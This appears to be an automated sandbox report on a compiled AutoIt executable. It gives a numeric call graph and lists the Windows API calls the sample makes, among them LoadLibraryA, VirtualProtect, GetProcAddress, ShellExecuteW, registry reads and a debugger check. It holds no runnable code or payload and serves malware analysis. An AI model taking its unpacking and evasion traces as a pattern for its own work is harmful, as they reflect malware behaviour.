28665e 99788->99789 99790 286641 99788->99790 99789->98103 99790->99789 99792 286621 60 API calls Mailbox 99790->99792 99792->99790 99793->98117 99794 270226 99803 23ade2 Mailbox 99794->99803 99796 270c86 99797 2866f4 Mailbox 60 API calls 99796->99797 99798 270c8f 99797->99798 99800 2700e0 VariantClear 99800->99803 99801 23b6c1 99812 29a0b5 90 API calls 4 library calls 99801->99812 99803->99796 99803->99798 99803->99800 99803->99801 99804 2ae24b 131 API calls 99803->99804 99805 235906 61 API calls 99803->99805 99806 2a474d 332 API calls 99803->99806 99807 242123 96 API calls 99803->99807 99808 2ae237 131 API calls 99803->99808 99809 29d2e6 102 API calls 99803->99809 99810 239df0 60 API calls Mailbox 99803->99810 99811 287405 60 API calls 99803->99811 99804->99803 99805->99803 99806->99803 99807->99803 99808->99803 99809->99803 99810->99803 99811->99803 99812->99796 99813 34f090 99814 34f0a0 99813->99814 99815 34f1ba LoadLibraryA 99814->99815 99819 34f1ff VirtualProtect VirtualProtect 99814->99819 99816 34f1d1 99815->99816 99816->99814 99818 34f1e3 GetProcAddress 99816->99818 99818->99816 99821 34f1f9 ExitProcess 99818->99821 99820 34f264 99819->99820 99820->99820 99822 231066 99827 23f8cf 99822->99827 99824 23106c 99860 252f80 99824->99860 99828 23f8f0 99827->99828 99863 250143 99828->99863 99832 23f937 99833 2377c7 60 API calls 99832->99833 99834 23f941 99833->99834 99835 2377c7 60 API calls 99834->99835 99836 23f94b 99835->99836 99837 2377c7 60 API calls 99836->99837 99838 23f955 99837->99838 99839 2377c7 60 API calls 99838->99839 99840 23f993 99839->99840 99841 2377c7 60 API calls 99840->99841 99842 23fa5e 99841->99842 99873 2460e7 99842->99873 99846 23fa90 99847 2377c7 60 API calls 99846->99847 99848 23fa9a 99847->99848 99901 24ffde 99848->99901 99850 23fae1 99851 23faf1 GetStdHandle 99850->99851 99852 2749d5 99851->99852 99853 23fb3d 99851->99853 99852->99853 99855 2749de 99852->99855 99854 23fb45 OleInitialize 99853->99854 99854->99824 99908 296dda 65 API calls Mailbox 99855->99908 99857 2749e5 99909 2974a9 CreateThread 99857->99909 99859 2749f1 CloseHandle 99859->99854 99922 252e84 99860->99922 99862 231076 99910 25021c 99863->99910 99866 25021c 60 API calls 99867 250185 99866->99867 99868 2377c7 60 API calls 99867->99868 99869 250191 99868->99869 99870 237d2c 60 API calls 99869->99870 99871 23f8f6 99870->99871 99872 2503a2 6 API calls 99871->99872 99872->99832 99874 2377c7 60 API calls 99873->99874 99875 2460f7 99874->99875 99876 2377c7 60 API calls 99875->99876 99877 2460ff 99876->99877 99917 245bfd 99877->99917 99880 245bfd 60 API calls 99881 24610f 99880->99881 99882 2377c7 60 API calls 99881->99882 99883 24611a 99882->99883 99884 250ff6 Mailbox 60 API calls 99883->99884 99885 23fa68 99884->99885 99886 246259 99885->99886 99887 246267 99886->99887 99888 2377c7 60 API calls 99887->99888 99889 246272 99888->99889 99890 2377c7 60 API calls 99889->99890 99891 24627d 99890->99891 99892 2377c7 60 API calls 99891->99892 99893 246288 99892->99893 99894 2377c7 60 API calls 99893->99894 99895 246293 99894->99895 99896 245bfd 60 API calls 99895->99896 99897 24629e 99896->99897 99898 250ff6 Mailbox 60 API calls 99897->99898 99899 2462a5 RegisterClipboardFormatW 99898->99899 99899->99846 99902 24ffee 99901->99902 99903 285cc3 99901->99903 99904 250ff6 Mailbox 60 API calls 99902->99904 99920 299d71 61 API calls 99903->99920 99906 24fff6 99904->99906 99906->99850 99907 285cce 99908->99857 99909->99859 99921 29748f 66 API calls 99909->99921 99911 2377c7 60 API calls 99910->99911 99912 250227 99911->99912 99913 2377c7 60 API calls 99912->99913 99914 25022f 99913->99914 99915 2377c7 60 API calls 99914->99915 99916 25017b 99915->99916 99916->99866 99918 2377c7 60 API calls 99917->99918 99919 245c05 99918->99919 99919->99880 99920->99907 99923 252e90 __fcloseall 99922->99923 99930 253457 99923->99930 99929 252eb7 __fcloseall 99929->99862 99931 259e4b __lock 59 API calls 99930->99931 99932 252e99 99931->99932 99933 252ec8 RtlDecodePointer RtlDecodePointer 99932->99933 99934 252ef5 99933->99934 99935 252ea5 99933->99935 99934->99935 99947 2589e4 60 API calls 2 library calls 99934->99947 99944 252ec2 99935->99944 99937 252f07 99938 252f58 RtlEncodePointer RtlEncodePointer 99937->99938 99939 252f2c 99937->99939 99948 258aa4 62 API calls 2 library calls 99937->99948 99938->99935 99939->99935 99942 252f46 RtlEncodePointer 99939->99942 99949 258aa4 62 API calls 2 library calls 99939->99949 99942->99938 99943 252f40 99943->99935 99943->99942 99950 253460 99944->99950 99947->99937 99948->99939 99949->99943 99953 259fb5 RtlLeaveCriticalSection 99950->99953 99952 252ec7 99952->99929 99953->99952 99954 1623b0 99968 160000 99954->99968 99956 162461 99971 1622a0 99956->99971 99974 163490 GetPEB 99968->99974 99970 16068b 99970->99956 99972 1622a9 Sleep 99971->99972 99973 1622b7 99972->99973 99975 1634ba 99974->99975 99975->99970 99976 23e70b 99979 23d260 99976->99979 99978 23e719 99980 23d27d 99979->99980 100008 23d4dd 99979->100008 99981 272abb 99980->99981 99982 272b0a 99980->99982 100012 23d2a4 99980->100012 99983 272abe 99981->99983 99993 272ad9 99981->99993 100037 2aa6fb 332 API calls __cinit 99982->100037 99986 272aca 99983->99986 99983->100012 100035 2aad0f 332 API calls 99986->100035 99989 252f80 __cinit 68 API calls 99989->100012 99990 23d594 100030 238bb2 69 API calls 99990->100030 99991 272cdf 99991->99991 99992 23d6ab 99992->99978 99993->100008 100036 2ab1b7 332 API calls 3 library calls 99993->100036 99997 23d5a3 99997->99978 99998 272c26 100041 2aaa66 90 API calls 99998->100041 100008->99992 100042 29a0b5 90 API calls 4 library calls 100008->100042 100009 23a000 332 API calls 100009->100012 100010 2381a7 60 API calls 100010->100012 100012->99989 100012->99990 100012->99992 100012->99998 100012->100008 100012->100009 100012->100010 100013 239f3a 100012->100013 100018 2388a0 100012->100018 100025 2386a2 69 API calls 100012->100025 100026 238620 100012->100026 100031 23859a 69 API calls 100012->100031 100032 23d0dc 332 API calls 100012->100032 100033 23d060 90 API calls 100012->100033 100034 23cedd 332 API calls 100012->100034 100038 238bb2 69 API calls 100012->100038 100039 239e9c 61 API calls Mailbox 100012->100039 100040 286d03 61 API calls 100012->100040 100014 250ff6 Mailbox 60 API calls 100013->100014 100015 239f47 100014->100015 100016 239f56 100015->100016 100017 237f41 60 API calls 100015->100017 100016->100012 100017->100016 100019 2388b3 100018->100019 100020 238a81 100018->100020 100021 2377c7 60 API calls 100019->100021 100024 2388c4 100019->100024 100020->100012 100022 238ae3 100021->100022 100023 252f80 __cinit 68 API calls 100022->100023 100023->100024 100024->100012 100025->100012 100027 23862b 100026->100027 100029 238652 100027->100029 100043 238b13 100027->100043 100029->100012 100030->99997 100031->100012 100032->100012 100033->100012 100034->100012 100035->99992 100036->100008 100037->100012 100038->100012 100039->100012 100040->100012 100041->100008 100042->99991 100044 2388a0 69 API calls 100043->100044 100045 238b23 100044->100045 100046 238b9d 100045->100046 100047 238b2d 100045->100047 100061 239e9c 61 API calls Mailbox 100046->100061 100048 250ff6 Mailbox 60 API calls 100047->100048 100050 238b3e 100048->100050 100051 238b4c 100050->100051 100052 2377c7 60 API calls 100050->100052 100053 238b5b 100051->100053 100059 2380d7 60 API calls 2 library calls 100051->100059 100052->100051 100055 250ff6 Mailbox 60 API calls 100053->100055 100056 238b65 100055->100056 100060 2387c0 69 API calls 100056->100060 100058 238b8d 100058->100029 100059->100053 100060->100058 100061->100058 100062 27220e GetTempPathW 100063 27222b 100062->100063 100063->100063 100064 23568a 100065 235c18 60 API calls 100064->100065 100066 23569c 100065->100066 100067 235632 62 API calls 100066->100067 100068 2356aa 100067->100068 100070 2356ba Mailbox 100068->100070 100071 2381c1 MultiByteToWideChar 100068->100071 100072 2381e7 100071->100072 100073 23822e 100071->100073 100074 250ff6 Mailbox 60 API calls 100072->100074 100075 237eec 60 API calls 100073->100075 100076 2381fc MultiByteToWideChar 100074->100076 100078 238220 100075->100078 100079 2378ad 60 API calls 2 library calls 100076->100079 100078->100070 100079->100078 100080 23b56e 100087 24fb84 100080->100087 100082 23b584 100083 23c707 70 API calls 100082->100083 100084 23b5ac 100083->100084 100086 23a4e8 100084->100086 100096 29a0b5 90 API calls 4 library calls 100084->100096 100088 24fb90 100087->100088 100089 24fba2 100087->100089 100097 239e9c 61 API calls Mailbox 100088->100097 100091 24fbd1 100089->100091 100092 24fba8 100089->100092 100098 239e9c 61 API calls Mailbox 100091->100098 100094 250ff6 Mailbox 60 API calls 100092->100094 100095 24fb9a 100094->100095 100095->100082 100096->100086 100097->100095 100098->100095 100099 233633 100100 23366a 100099->100100 100101 2336e7 100100->100101 100102 233688 100100->100102 100139 2336e5 100100->100139 100104 26d31c 100101->100104 100105 2336ed 100101->100105 100106 233695 100102->100106 100107 23375d PostQuitMessage 100102->100107 100103 2336ca NtdllDefWindowProc_W 100141 2336d8 100103->100141 100149 2411d0 10 API calls Mailbox 100104->100149 100108 2336f2 100105->100108 100109 233715 SetTimer RegisterClipboardFormatW 100105->100109 100110 2336a0 100106->100110 100111 26d38f 100106->100111 100107->100141 100113 26d2bf 100108->100113 100114 2336f9 KillTimer 100108->100114 100115 23373e CreatePopupMenu 100109->100115 100109->100141 100116 233767 100110->100116 100117 2336a8 100110->100117 100164 292a16 72 API calls _memset 100111->100164 100121 26d2c4 100113->100121 100122 26d2f8 MoveWindow 100113->100122 100144 2344cb Shell_NotifyIconW _memset 100114->100144 100115->100141 100147 234531 65 API calls _memset 100116->100147 100124 2336b3 100117->100124 100125 26d374 100117->100125 100119 26d343 100150 2411f3 332 API calls Mailbox 100119->100150 100130 26d2e7 SetFocus 100121->100130 100131 26d2c8 100121->100131 100122->100141 100128 2336be 100124->100128 100133 23374b 100124->100133 100125->100103 100163 28817e 60 API calls Mailbox 100125->100163 100126 26d3a1 100126->100103 100126->100141 100128->100103 100151 2344cb Shell_NotifyIconW _memset 100128->100151 100129 23375b 100129->100141 100130->100141 100131->100128 100134 26d2d1 100131->100134 100132 23370c 100145 233114 DeleteObject DestroyWindow Mailbox 100132->100145 100146 2345df 82 API calls _memset 100133->100146 100148 2411d0 10 API calls Mailbox 100134->100148 100139->100103 100142 26d368 100152 2343db 100142->100152 100144->100132 100145->100141 100146->100129 100147->100129 100148->100141 100149->100119 100150->100128 100151->100142 100153 234406 _memset 100152->100153 100165 234213 100153->100165 100156 23448b 100158 2344c1 Shell_NotifyIconW 100156->100158 100159 2344a5 Shell_NotifyIconW 100156->100159 100160 2344b3 100158->100160 100159->100160 100169 23410d 100160->100169 100162 2344ba 100162->100139 100163->100139 100164->100126 100166 234227 100165->100166 100167 26d638 100165->100167 100166->100156 100191 293226 63 API calls _W_store_winword 100166->100191 100167->100166 100168 26d641 DestroyCursor 100167->100168 100168->100166 100170 234200 Mailbox 100169->100170 100171 234129 100169->100171 100170->100162 100172 237b76 60 API calls 100171->100172 100173 234137 100172->100173 100174 234144 100173->100174 100175 26d5dd LoadStringW 100173->100175 100176 237d2c 60 API calls 100174->100176 100178 26d5f7 100175->100178 100177 234159 100176->100177 100177->100178 100179 23416a 100177->100179 100180 237c8e 60 API calls 100178->100180 100181 234205 100179->100181 100182 234174 100179->100182 100185 26d601 100180->100185 100184 2381a7 60 API calls 100181->100184 100183 237c8e 60 API calls 100182->100183 100187 23417e _memset _wcscpy 100183->100187 100184->100187 100186 237e0b 60 API calls 100185->100186 100185->100187 100188 26d623 100186->100188 100189 2341e6 Shell_NotifyIconW 100187->100189 100190 237e0b 60 API calls 100188->100190 100189->100170 100190->100187 100191->100156 100192 231016 100197 234ad2 100192->100197 100195 252f80 __cinit 68 API calls 100196 231025 100195->100196 100198 250ff6 Mailbox 60 API calls 100197->100198 100199 234ada 100198->100199 100200 23101b 100199->100200 100204 234a94 100199->100204 100200->100195 100205 234aaf 100204->100205 100206 234a9d 100204->100206 100208 234afe 100205->100208 100207 252f80 __cinit 68 API calls 100206->100207 100207->100205 100209 2377c7 60 API calls 100208->100209 100210 234b16 GetVersionExW 100209->100210 100211 237d2c 60 API calls 100210->100211 100212 234b59 100211->100212 100213 237e8c 60 API calls 100212->100213 100222 234b86 100212->100222 100214 234b7a 100213->100214 100236 237886 100214->100236 100216 234bf1 GetCurrentProcess IsWow64Process 100217 234c0a 100216->100217 100219 234c20 100217->100219 100220 234c89 GetSystemInfo 100217->100220 100218 26dc8d 100232 234c95 100219->100232 100221 234c56 100220->100221 100221->100200 100222->100216 100222->100218 100225 234c32 100228 234c95 2 API calls 100225->100228 100226 234c7d GetSystemInfo 100227 234c47 100226->100227 100227->100221 100230 234c4d FreeLibrary 100227->100230 100229 234c3a GetNativeSystemInfo 100228->100229 100229->100227 100230->100221 100233 234c2e 100232->100233 100234 234c9e LoadLibraryA 100232->100234 100233->100225 100233->100226 100234->100233 100235 234caf GetProcAddress 100234->100235 100235->100233 100237 237894 100236->100237 100238 237e8c 60 API calls 100237->100238 100239 2378a4 100238->100239 100239->100222 100240 231055 100245 232649 100240->100245 100243 252f80 __cinit 68 API calls 100244 231064 100243->100244 100246 2377c7 60 API calls 100245->100246 100247 2326b7 100246->100247 100252 233582 100247->100252 100250 232754 100251 23105a 100250->100251 100255 233416 100250->100255 100251->100243 100261 2335b0 100252->100261 100256 23344e 100255->100256 100260 233428 _memmove 100255->100260 100259 250ff6 Mailbox 60 API calls 100256->100259 100257 250ff6 Mailbox 60 API calls 100258 23342e 100257->100258 100258->100250 100259->100260 100260->100257 100262 2335a1 100261->100262 100263 2335bd 100261->100263 100262->100250 100263->100262 100264 2335c4 RegOpenKeyExW 100263->100264 100264->100262 100265 2335de RegQueryValueExW 100264->100265 100266 233614 RegCloseKey 100265->100266 100267 2335ff 100265->100267 100266->100262 100267->100266 100268 257e93 100269 257e9f __fcloseall 100268->100269 100305 25a048 GetStartupInfoW 100269->100305 100271 257ea4 100307 258dbc GetProcessHeap 100271->100307 100273 257efc 100276 257f07 100273->100276 100390 257fe3 59 API calls 3 library calls 100273->100390 100308 259d26 100276->100308 100277 257f0d 100278 257f18 __RTC_Initialize 100277->100278 100391 257fe3 59 API calls 3 library calls 100277->100391 100329 25d812 100278->100329 100281 257f27 100282 257f33 GetCommandLineW 100281->100282 100392 257fe3 59 API calls 3 library calls 100281->100392 100348 265173 GetEnvironmentStringsW 100282->100348 100285 257f32 100285->100282 100288 257f4d 100289 257f58 100288->100289 100393 2532f5 59 API calls 3 library calls 100288->100393 100358 264fa8 100289->100358 100292 257f5e 100293 257f69 100292->100293 100394 2532f5 59 API calls 3 library calls 100292->100394 100372 25332f 100293->100372 100296 257f71 100297 257f7c __wwincmdln 100296->100297 100395 2532f5 59 API calls 3 library calls 100296->100395 100378 23492e 100297->100378 100300 257f90 100301 257f9f 100300->100301 100396 253598 59 API calls _doexit 100300->100396 100397 253320 59 API calls _doexit 100301->100397 100304 257fa4 __fcloseall 100306 25a05e 100305->100306 100306->100271 100307->100273 100398 2533c7 RtlEncodePointer 100308->100398 100310 259d2b 100404 259f7c 100310->100404 100313 259d34 100408 259d9c 62 API calls 2 library calls 100313->100408 100316 259d39 100316->100277 100317 259d46 100317->100313 100318 259d51 100317->100318 100410 258a15 100318->100410 100320 259d5e 100321 259d93 100320->100321 100416 25a026 TlsSetValue 100320->100416 100418 259d9c 62 API calls 2 library calls 100321->100418 100324 259d72 100324->100321 100326 259d78 100324->100326 100325 259d98 100325->100277 100417 259c73 59 API calls 4 library calls 100326->100417 100328 259d80 GetCurrentThreadId 100328->100277 100330 25d81e __fcloseall 100329->100330 100331 259e4b __lock 59 API calls 100330->100331 100332 25d825 100331->100332 100333 258a15 __calloc_crt 59 API calls 100332->100333 100335 25d836 100333->100335 100334 25d8a1 GetStartupInfoW 100343 25d9e5 100334->100343 100344 25d8b6 100334->100344 100335->100334 100336 25d841 __fcloseall @_EH4_CallFilterFunc@8 100335->100336 100336->100281 100337 25daad 100432 25dabd RtlLeaveCriticalSection _doexit 100337->100432 100338 25d904 100338->100343 100345 25d938 GetFileType 100338->100345 100346 25a06b __getstream 2 API calls 100338->100346 100340 258a15 __calloc_crt 59 API calls 100340->100344 100341 25da32 GetStdHandle 100341->100343 100342 25da45 GetFileType 100342->100343 100343->100337 100343->100341 100343->100342 100347 25a06b __getstream 2 API calls 100343->100347 100344->100338 100344->100340 100344->100343 100345->100338 100346->100338 100347->100343 100349 265184 100348->100349 100350 257f43 100348->100350 100433 258a5d 59 API calls 2 library calls 100349->100433 100354 264d6b GetModuleFileNameW 100350->100354 100352 2651c0 FreeEnvironmentStringsW 100352->100350 100353 2651aa _memmove 100353->100352 100355 264d9f _wparse_cmdline 100354->100355 100357 264ddf _wparse_cmdline 100355->100357 100434 258a5d 59 API calls 2 library calls 100355->100434 100357->100288 100359 264fc1 __NMSG_WRITE 100358->100359 100363 264fb9 100358->100363 100360 258a15 __calloc_crt 59 API calls 100359->100360 100368 264fea __NMSG_WRITE 100360->100368 100361 265041 100362 252f95 _free 59 API calls 100361->100362 100362->100363 100363->100292 100364 258a15 __calloc_crt 59 API calls 100364->100368 100365 265066 100366 252f95 _free 59 API calls 100365->100366 100366->100363 100368->100361 100368->100363 100368->100364 100368->100365 100369 26507d 100368->100369 100435 264857 59 API calls 2 library calls 100368->100435 100436 259006 IsProcessorFeaturePresent 100369->100436 100371 265089 100371->100292 100373 25333b __IsNonwritableInCurrentImage 100372->100373 100451 25a711 100373->100451 100375 253359 __initterm_e 100376 252f80 __cinit 68 API calls 100375->100376 100377 253378 _doexit __IsNonwritableInCurrentImage 100375->100377 100376->100377 100377->100296 100379 234948 100378->100379 100389 2349e7 100378->100389 100380 234982 73666F36 100379->100380 100454 2535ac 100380->100454 100384 2349ae 100466 234a5b SystemParametersInfoW SystemParametersInfoW 100384->100466 100386 2349ba 100467 233b4c 100386->100467 100389->100300 100390->100276 100391->100278 100392->100285 100396->100301 100397->100304 100419 253607 100398->100419 100400 2533d8 __init_pointers __initp_misc_winsig 100420 25a764 RtlEncodePointer 100400->100420 100402 2533f0 __init_pointers 100403 25a0d9 34 API calls 100402->100403 100403->100310 100405 259f88 100404->100405 100406 259d30 100405->100406 100407 25a06b __getstream 2 API calls 100405->100407 100406->100313 100409 259fca TlsAlloc 100406->100409 100407->100405 100408->100316 100409->100317 100411 258a1c 100410->100411 100413 258a57 100411->100413 100415 258a3a 100411->100415 100421 265446 100411->100421 100413->100320 100415->100411 100415->100413 100429 25a372 Sleep 100415->100429 100416->100324 100417->100328 100418->100325 100419->100400 100420->100402 100422 265451 100421->100422 100427 26546c 100421->100427 100423 26545d 100422->100423 100422->100427 100430 258d68 59 API calls __getptd_noexit 100423->100430 100424 26547c RtlAllocateHeap 100426 265462 100424->100426 100424->100427 100426->100411 100427->100424 100427->100426 100431 2535e1 RtlDecodePointer 100427->100431 100429->100415 100430->100426 100431->100427 100432->100336 100433->100353 100434->100357 100435->100368 100437 259011 100436->100437 100442 258e99 100437->100442 100441 25902c 100441->100371 100443 258eb3 _memset ___raise_securityfailure 100442->100443 100444 258ed3 IsDebuggerPresent 100443->100444 100450 25a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 100444->100450 100446 25c836 __fputwc_nolock 6 API calls 100448 258fba 100446->100448 100447 258f97 ___raise_securityfailure 100447->100446 100449 25a380 GetCurrentProcess TerminateProcess 100448->100449 100449->100441 100450->100447 100452 25a714 RtlEncodePointer 100451->100452 100452->100452 100453 25a72e 100452->100453 100453->100375 100455 259e4b __lock 59 API calls 100454->100455 100456 2535b7 RtlDecodePointer RtlEncodePointer 100455->100456 100519 259fb5 RtlLeaveCriticalSection 100456->100519 100458 2349a7 100459 253614 100458->100459 100460 25361e 100459->100460 100461 253638 100459->100461 100460->100461 100520 258d68 59 API calls __getptd_noexit 100460->100520 100461->100384 100463 253628 100521 258ff6 9 API calls __strnicoll_l 100463->100521 100465 253633 100465->100384 100466->100386 100468 233b59 __write_nolock 100467->100468 100469 2377c7 60 API calls 100468->100469 100470 233b63 GetCurrentDirectoryW 100469->100470 100522 233778 100470->100522 100472 233b8c IsDebuggerPresent 100519->100458 100520->100463 100521->100465 100523 2377c7 60 API calls 100522->100523 100524 23378e 100523->100524 100730 233d43 100524->100730 100526 2337ac 100527 234864 62 API calls 100526->100527 100528 2337c0 100527->100528 100529 237f41 60 API calls 100528->100529 100530 2337cd 100529->100530 100531 234f3d 137 API calls 100530->100531 100532 2337e6 100531->100532 100533 26d3ae 100532->100533 100534 2337ee Mailbox 100532->100534 100772 2997e5 100533->100772 100538 2381a7 60 API calls 100534->100538 100537 26d3cd 100540 252f95 _free 59 API calls 100537->100540 100541 233801 100538->100541 100539 234faa 85 API calls 100539->100537 100542 26d3da 100540->100542 100744 2393ea 100541->100744 100544 234faa 85 API calls 100542->100544 100546 26d3e3 100544->100546 100550 233ee2 60 API calls 100546->100550 100547 237f41 60 API calls 100548 23381a 100547->100548 100549 238620 70 API calls 100548->100549 100551 23382c Mailbox 100549->100551 100552 26d3fe 100550->100552 100553 237f41 60 API calls 100551->100553 100554 233ee2 60 API calls 100552->100554 100555 233852 100553->100555 100556 26d41a 100554->100556 100557 238620 70 API calls 100555->100557 100558 234864 62 API calls 100556->100558 100560 233861 Mailbox 100557->100560 100559 26d43f 100558->100559 100561 233ee2 60 API calls 100559->100561 100563 2377c7 60 API calls 100560->100563 100562 26d44b 100561->100562 100564 2381a7 60 API calls 100562->100564 100565 23387f 100563->100565 100566 26d459 100564->100566 100747 233ee2 100565->100747 100569 233ee2 60 API calls 100566->100569 100570 26d468 100569->100570 100576 2381a7 60 API calls 100570->100576 100572 233899 100572->100546 100573 2338a3 100572->100573 100574 25313d _W_store_winword 61 API calls 100573->100574 100575 2338ae 100574->100575 100575->100552 100577 2338b8 100575->100577 100578 26d48a 100576->100578 100579 25313d _W_store_winword 61 API calls 100577->100579 100580 233ee2 60 API calls 100578->100580 100581 2338c3 100579->100581 100582 26d497 100580->100582 100581->100556 100583 2338cd 100581->100583 100582->100582 100584 25313d _W_store_winword 61 API calls 100583->100584 100585 2338d8 100584->100585 100585->100570 100586 233919 100585->100586 100588 233ee2 60 API calls 100585->100588 100586->100570 100587 233926 100586->100587 100589 23942e 60 API calls 100587->100589 100590 2338fc 100588->100590 100592 233936 100589->100592 100591 2381a7 60 API calls 100590->100591 100593 23390a 100591->100593 100594 2391b0 60 API calls 100592->100594 100595 233ee2 60 API calls 100593->100595 100596 233944 100594->100596 100595->100586 100763 239040 100596->100763 100598 2393ea 60 API calls 100600 233961 100598->100600 100599 239040 61 API calls 100599->100600 100600->100598 100600->100599 100601 233ee2 60 API calls 100600->100601 100602 2339a7 Mailbox 100600->100602 100601->100600 100602->100472 100731 233d50 __write_nolock 100730->100731 100732 237d2c 60 API calls 100731->100732 100736 233eb6 Mailbox 100731->100736 100733 233d82 100732->100733 100734 237b52 60 API calls 100733->100734 100742 233db8 Mailbox 100733->100742 100734->100733 100735 233e89 100735->100736 100737 237f41 60 API calls 100735->100737 100736->100526 100739 233eaa 100737->100739 100738 237f41 60 API calls 100738->100742 100741 233f84 60 API calls 100739->100741 100740 237b52 60 API calls 100740->100742 100741->100736 100742->100735 100742->100736 100742->100738 100742->100740 100807 233f84 100742->100807 100745 250ff6 Mailbox 60 API calls 100744->100745 100746 23380d 100745->100746 100746->100547 100748 233f05 100747->100748 100749 233eec 100747->100749 100750 237d2c 60 API calls 100748->100750 100751 2381a7 60 API calls 100749->100751 100752 23388b 100750->100752 100751->100752 100753 25313d 100752->100753 100754 2531be 100753->100754 100755 253149 100753->100755 100815 2531d0 61 API calls 4 library calls 100754->100815 100759 25316e 100755->100759 100813 258d68 59 API calls __getptd_noexit 100755->100813 100758 2531cb 100758->100572 100759->100572 100760 253155 100814 258ff6 9 API calls __strnicoll_l 100760->100814 100762 253160 100762->100572 100764 26f5a5 100763->100764 100766 239057 100763->100766 100764->100766 100817 238d3b 60 API calls Mailbox 100764->100817 100767 2391a0 100766->100767 100768 239158 100766->100768 100771 23915f 100766->100771 100816 239e9c 61 API calls Mailbox 100767->100816 100770 250ff6 Mailbox 60 API calls 100768->100770 100770->100771 100771->100600 100773 235045 86 API calls 100772->100773 100774 299854 100773->100774 100775 2999be 97 API calls 100774->100775 100776 299866 100775->100776 100777 23506b 75 API calls 100776->100777 100804 26d3c1 100776->100804 100778 299881 100777->100778 100779 23506b 75 API calls 100778->100779 100780 299891 100779->100780 100781 23506b 75 API calls 100780->100781 100782 2998ac 100781->100782 100783 23506b 75 API calls 100782->100783 100784 2998c7 100783->100784 100785 235045 86 API calls 100784->100785 100786 2998de 100785->100786 100787 25594c _W_store_winword 59 API calls 100786->100787 100788 2998e5 100787->100788 100789 25594c _W_store_winword 59 API calls 100788->100789 100790 2998ef 100789->100790 100791 23506b 75 API calls 100790->100791 100792 299903 100791->100792 100793 299393 GetSystemTimeAsFileTime 100792->100793 100794 299916 100793->100794 100795 29992b 100794->100795 100796 299940 100794->100796 100799 252f95 _free 59 API calls 100795->100799 100797 2999a5 100796->100797 100798 299946 100796->100798 100801 252f95 _free 59 API calls 100797->100801 100800 298d90 117 API calls 100798->100800 100802 299931 100799->100802 100803 29999d 100800->100803 100801->100804 100805 252f95 _free 59 API calls 100802->100805 100806 252f95 _free 59 API calls 100803->100806 100804->100537 100804->100539 100805->100804 100806->100804 100808 233f92 100807->100808 100812 233fb4 _memmove 100807->100812 100810 250ff6 Mailbox 60 API calls 100808->100810 100809 250ff6 Mailbox 60 API calls 100811 233fc8 100809->100811 100810->100812 100811->100742 100812->100809 100813->100760 100814->100762 100815->100758 100816->100771 100817->100766 101108 231078 101113 2371eb 101108->101113 101110 23108c 101111 252f80 __cinit 68 API calls 101110->101111 101112 231096 101111->101112 101114 2371fb __write_nolock 101113->101114 101115 2377c7 60 API calls 101114->101115 101116 2372b1 101115->101116 101117 234864 62 API calls 101116->101117 101118 2372ba 101117->101118 101144 25074f 101118->101144 101121 237e0b 60 API calls 101122 2372d3 101121->101122 101123 233f84 60 API calls 101122->101123 101124 2372e2 101123->101124 101125 2377c7 60 API calls 101124->101125 101126 2372eb 101125->101126 101127 237eec 60 API calls 101126->101127 101128 2372f4 RegOpenKeyExW 101127->101128 101129 26ecda RegQueryValueExW 101128->101129 101133 237316 Mailbox 101128->101133 101130 26ecf7 101129->101130 101131 26ed6c RegCloseKey 101129->101131 101132 250ff6 Mailbox 60 API calls 101130->101132 101131->101133 101143 26ed7e _wcscat Mailbox __NMSG_WRITE 101131->101143 101134 26ed10 101132->101134 101133->101110 101135 23538e 60 API calls 101134->101135 101136 26ed1b RegQueryValueExW 101135->101136 101138 26ed38 101136->101138 101140 26ed52 101136->101140 101137 237b52 60 API calls 101137->101143 101139 237d2c 60 API calls 101138->101139 101139->101140 101140->101131 101141 237f41 60 API calls 101141->101143 101142 233f84 60 API calls 101142->101143 101143->101133 101143->101137 101143->101141 101143->101142 101145 261b90 __write_nolock 101144->101145 101146 25075c GetFullPathNameW 101145->101146 101147 25077e 101146->101147 101148 237d2c 60 API calls 101147->101148 101149 2372c5 101148->101149 101149->101121

                                            Control-flow Graph

                                            APIs
                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00233B7A
                                            • IsDebuggerPresent.KERNEL32 ref: 00233B8C
                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,002F62F8,002F62E0,?,?), ref: 00233BFD
                                              • Part of subcall function 00237D2C: _memmove.LIBCMT ref: 00237D66
                                              • Part of subcall function 00240A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00233C26,002F62F8,?,?,?), ref: 00240ACE
                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00233C81
                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,002E93F0,00000010), ref: 0026D4BC
                                            • SetCurrentDirectoryW.KERNEL32(?,002F62F8,?,?,?), ref: 0026D4F4
                                            • GetForegroundWindow.USER32 ref: 0026D57A
                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 0026D581
                                              • Part of subcall function 00233A58: GetSysColorBrush.USER32(0000000F), ref: 00233A62
                                              • Part of subcall function 00233A58: LoadCursorW.USER32(00000000,00007F00), ref: 00233A71
                                              • Part of subcall function 00233A58: LoadIconW.USER32(00000063), ref: 00233A88
                                              • Part of subcall function 00233A58: LoadIconW.USER32(000000A4), ref: 00233A9A
                                              • Part of subcall function 00233A58: LoadIconW.USER32(000000A2), ref: 00233AAC
                                              • Part of subcall function 00233A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00233AD2
                                              • Part of subcall function 00233A58: RegisterClassExW.USER32(?), ref: 00233B28
                                              • Part of subcall function 002339E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00233A15
                                              • Part of subcall function 002339E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00233A36
                                              • Part of subcall function 002339E7: ShowWindow.USER32(00000000), ref: 00233A4A
                                              • Part of subcall function 002339E7: ShowWindow.USER32(00000000), ref: 00233A53
                                              • Part of subcall function 002343DB: _memset.LIBCMT ref: 00234401
                                              • Part of subcall function 002343DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 002344A6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.395556369.0000000000231000.00000040.00000001.01000000.00000004.sdmp, Offset: 00230000, based on PE: true
                                            • Associated: 0000000A.00000002.395552994.0000000000230000.00000002.00000001.01000000.00000004.sdmpDownload File
